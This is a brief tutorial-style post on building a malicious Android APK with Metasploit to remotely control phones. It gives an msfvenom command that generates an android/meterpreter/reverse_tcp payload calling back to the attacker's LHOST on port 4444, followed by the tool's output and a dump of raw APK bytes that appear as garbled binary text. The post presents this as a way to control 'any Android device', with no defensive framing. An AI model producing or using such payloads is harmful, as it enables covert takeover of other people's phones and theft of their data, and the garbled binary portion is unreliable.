Nasha Exploit Injecting As A Metasploit Payloads Apk Into Android Applications To Remote Control Any Android Device
On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes PD�>T�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O��@��@��"��]T�`B�▒+8��Z������� U�K>@�]tQU�˪� uY� S�V{�B��F�E*~&B��n�,tz�� =�����^@?B�@B3���2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!� �j� Nh���k�f� �} } ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K▒q%����}���T@�]�����K����=�z��-FM��s\)E{��MK?��G ��o�~��3��I�?��V�"ε2�qԏ�te ���;�� �$jR�<�ef�#5�=z�T�8-#�5����.��h��3�~��O��t ��i��^��ۼ���5��~%S,��C-C> \M?s�KI�az_/��[vγ�▒��▒�0�ȸ�2���E��,^�9�Ĕ�2z�▒��d�_��F*�z���lI�±,����*���7�eZO� X^�^�H�����X{�j�7ތY�u���l���ά�K�s�$��+&g